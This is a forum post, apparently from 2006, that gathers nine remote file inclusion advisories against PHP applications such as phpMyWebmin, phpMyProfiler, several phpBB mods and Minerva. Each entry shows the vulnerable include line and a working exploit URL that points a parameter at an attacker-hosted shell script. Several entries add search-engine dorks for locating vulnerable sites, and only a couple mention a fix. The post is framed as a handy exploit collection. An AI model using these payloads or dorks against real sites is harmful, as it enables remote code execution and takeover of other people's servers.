Ashura Unstopable Posts: 370
| cant be arsed to post em all in differ topics, so here u go all i see arround with php exploits in 1 place
Code: | 2006-09-30 phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities Rated as : Critical -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by XORON(turkish hacker) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Vuln. Code: include("$target/$folder/preferences.php"); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit: /change_preferences2.php?target=http://SH3LL? /create_file.php?target=http://SH3LL? /upload_local.php?target=http://SH3LL? /upload_multi.php?target=http://SH3LL? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= |
Code: | 2006-10-03 phpMyProfiler <= 0.9.6 Remote File Include Vulnerability Rated as : High Risk # Author: mozi2weed@yahoo.com mozi # phpMyProfiler Remote File Inclusion Vulnerability # Greetz: Raver #phpfreaks eu.undernet.org ------------------------------------------------------------------ Download: http://sourceforge.net/projects/phpmyprofiler ------------------------------------------------------------------ require_once($pmp_rel_path . '/include/PEAR/HTTP.php'); _________________________________________________________________ googledork:phpMyProfiler http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr ipt] PS:Whitehat aia de pe undernet sug pula!!! Lameri boratzi #phpfreaks rulz # heh tnx |
Code: | 2006-10-04 phpBB Static Topics <= 1.0 [phpbb_root_path] File Include Vulnerability Rated as : High Risk --------------------------------------------------------------------------- phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net : Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : phpBB Static Topics version : 1.0 URL : http://www.nivisec.com/downloads/phpbb/static_forums.zip ------------------------------------------------------------------ Exploit: ~~~~~ Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca n exploit this vulnerability with a simple php injection script. # http://www.site.com/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script] --------------------------------------------------------------------------- Solution : ~~~~~~~ declare variabel $phpbb_root_path --------------------------------------------------------------------------- Shoutz: ~~~ # Special greetz to my good friend [Oo] # To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ] --------------------------------------------------------------------------- */ Contact: ~~~~~ Nick: Kw3rLn E-mail: ciriboflacs[at]YaHoo[dot]Com |
Code: | 2006-10-04 phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability Rated as : High Risk # Author: mozi2weed@yahoo.com mozi # phpGreetz Remote File Inclusion Vulnerability # Greetz: Raver #phpfreaks eu.undernet.org # Greetz: SpiderZ , fUSiON ---------------------------------------------------------------- Download: http://sourceforge.net/project/showfiles.php?group_id=6127 ------------------------------------------------------------------ <? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?> ("phpgreetz-global.inc.php"); ("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php"); <td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?> $PHPGREETZ_INCLUDE_DIR = "$site_location/includes"; _________________________________________________________________ http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil . ### eu.undernet.org #phpfreaks team RaVeR -- nutzulake@yahoo.com mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com #phpfreaks again # heh tnx |
Code: | 2006-10-04 phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln Rated as : High Risk / \ \ \ ,, / / '-.`\()/`.-' .--_'( )'_--. / /` /`""`\ `\ \ * SpiderZ Hacking Security * | | >< | | \ \ / / '.__.' # Author: SpiderZ # Admin Topic Action Logging Remote File Inclusion Vulnerability # Version 0.95 Admin Topic Action Logging # For: phpBB ( 2.0.x - 2.0.21 ) # Site: www.spiderz.altervista.org # Site02: www.spiderz.netsons.org _________________________________________________________________________ http://site.com/[path]/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://[Evil_script] ------------------------------------------------------------------------------------- # Download: http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip # File: 38 KB ------------------------------------------------------------------------------------- |
Code: | PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability Rated as : High Risk Yeah, another ZeroDay Smile Vendor: http://www.pnphpbb.com/ Vulnerable File: includes/functions_admin.php Vulnerable Code: //The phpbb_root_path isn't initialize include_once( $phpbb_root_path . 'includes/functions.' . $phpEx ); Method To Use: http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt? How To Fix: Add this code before the include Code: if ( !defined('IN_PHPBB') ) { die("Hacking attempt"); } Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2 |
Code: | phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability Rated as : Moderate Risk Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbb_root_path isn't initialize include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx ); Method To Use: http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt? |
Code: | phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability Rated as : High Risk ########################################################### #phpBB XS <= 0.58 (phpbb_root_path) Remote File Include Vulnerability(2) ############################################################ #Author: XORON - SHiKaA ############################################################ #URL: http://www.comscripts.com/jump.php?action=script&id=1082 ############################################################ #Class: Remote ############################################################ #Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_bbcb_mg.' . $phpEx); ############################################################ #Exploit: http://www.site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://evil_scripts? http://www.site.com/[path]/includes/bbcb_mg.php?phpbb_root_path=http://evil_scripts? ############################################################ #Greetz: str0ke and AzzCoder ;) ############################################################ |
Code: | Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability Rated as : High Risk #============================================================================================== #Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download # #Version : All Versions # #================================================================================================ # #Dork : "Powered by Minerva" # #================================================================================================ #Bug in : admin/admin_topic_action_logging.php # #Vlu Code : #-------------------------------- # # if ( !empty($setmodules) ) #{ # include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx); # $module['Forums']['Action_Logging'] = basename(__FILE__); # return; # # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com |
|